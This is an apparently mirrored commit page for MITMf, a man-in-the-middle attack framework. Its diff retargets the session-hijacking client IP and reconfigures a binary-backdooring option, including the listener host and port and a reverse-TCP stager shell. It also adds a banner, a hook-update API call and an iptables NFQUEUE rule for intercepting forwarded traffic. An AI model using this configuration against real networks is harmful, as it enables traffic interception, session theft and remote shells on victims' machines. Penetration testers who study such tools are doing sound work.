mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 13:32:18 -07:00
Fixed IPtables for APF Mode
Added a new banner
This commit is contained in:
parent
16b774248d
commit
589e45b64f
5 changed files with 26 additions and 7 deletions
|
@ -79,7 +79,7 @@
|
|||
[Replace]
|
||||
|
||||
[[Regex1]]
|
||||
'Google Search' = 'Google yssas'
|
||||
'Google Search' = '44CON'
|
||||
|
||||
[[Regex2]]
|
||||
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
|
||||
|
@ -89,7 +89,7 @@
|
|||
# Here you can specify the client to hijack sessions from
|
||||
#
|
||||
|
||||
Client = '192.168.1.26'
|
||||
Client = '10.0.237.91'
|
||||
|
||||
[SSLstrip+]
|
||||
|
||||
|
@ -445,10 +445,10 @@
|
|||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
|
||||
PATCH_METHOD = automatic
|
||||
HOST = 192.168.1.16
|
||||
HOST = 192.168.20.79
|
||||
PORT = 8090
|
||||
# SHELL for use with automatic PATCH_METHOD
|
||||
SHELL = iat_reverse_tcp_inline_threaded
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = True
|
||||
|
|
|
@ -65,6 +65,19 @@ banner4 = """
|
|||
╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝
|
||||
"""
|
||||
|
||||
banner5 = """
|
||||
@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
|
||||
@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
|
||||
@@! @@! @@! @@! @@! @@! @@! @@! @@!
|
||||
!@! !@! !@! !@! !@! !@! !@! !@! !@!
|
||||
@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
|
||||
!@! ! !@! !!! !!! !@! ! !@! !!!!!:
|
||||
!!: !!: !!: !!: !!: !!: !!:
|
||||
:!: :!: :!: :!: :!: :!: :!:
|
||||
::: :: :: :: ::: :: ::
|
||||
: : : : : : :
|
||||
"""
|
||||
|
||||
def get_banner():
|
||||
banners = [banner1, banner2, banner3, banner4]
|
||||
banners = [banner1, banner2, banner3, banner4, banner5]
|
||||
return random.choice(banners)
|
||||
|
|
|
@ -342,6 +342,12 @@ class Session(object):
|
|||
logs.append(Log(log))
|
||||
return logs
|
||||
|
||||
def update(self, options={}):
|
||||
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
|
||||
payload = json.dumps(options)
|
||||
r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload)
|
||||
return r.json()
|
||||
|
||||
def run(self, module_id, options={}):
|
||||
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
|
||||
payload = json.dumps(options)
|
||||
|
|
|
@ -17,7 +17,7 @@ class PacketFilter:
|
|||
iptables().NFQUEUE()
|
||||
|
||||
self.nfqueue = NetfilterQueue()
|
||||
self.nfqueue.bind(1, self.modify)
|
||||
self.nfqueue.bind(0, self.modify)
|
||||
|
||||
self.nfqueue.run()
|
||||
|
||||
|
|
|
@ -98,5 +98,5 @@ class iptables:
|
|||
|
||||
def NFQUEUE(self):
|
||||
log.debug("Setting iptables NFQUEUE rule")
|
||||
os.system('iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1')
|
||||
os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')
|
||||
self.nfqueue = True
|
Loading…
Add table
Add a link
Reference in a new issue